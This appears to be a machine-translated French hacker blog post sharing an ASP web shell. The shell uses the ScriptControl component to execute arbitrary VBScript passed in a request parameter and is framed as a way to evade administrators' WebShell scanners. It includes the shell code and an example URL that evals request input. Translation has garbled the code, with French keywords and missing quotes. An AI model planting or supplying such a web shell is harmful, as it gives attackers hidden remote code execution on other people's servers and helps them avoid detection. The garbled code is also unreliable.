J'ai toujours été curieux de savoir pourquoi y a-t-il une évaluation ou une exécution dans le client. Peu importe où je me cache, l'administrateur peut me botter le cul en utilisant n'importe quel scanner WebShell XX. Aujourd'hui, j'ai refait des recherches sur le composant ScriptControl en VB et j'ai découvert qu'il peut également être appelé en asp. J'ai étudié la méthode et en ai ensuite discuté avec lcx. J'ai reçu le code suivant. Je voudrais remercier mes aînés pour leurs conseils, haha.
Le code est très simple, donc je ne l’expliquerai pas trop pour éviter que quiconque me reproche de faire semblant.
Copiez le code comme suit :
<%
Définir o = Server.CreateObject (ScriptControl)
o.langue = vbscript
o.addcode(Request(SubCode)) 'Paramètre SubCode comme code de processus
o.run e,Server,Response,Request,Application,Session,Error 'Appelez-le avec le nom de paramètre e et poussez 6 objets de base comme paramètres en même temps
'Exemple d'appel :
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
Notez que bien qu'il puisse être utilisé, l'expérience a révélé que seul le client Lake2 peut être utilisé. J'espère que quelqu'un pourra venir et rendre les choses plus générales. héhé. Ce serait également une bonne idée d'écrire votre propre client dédié.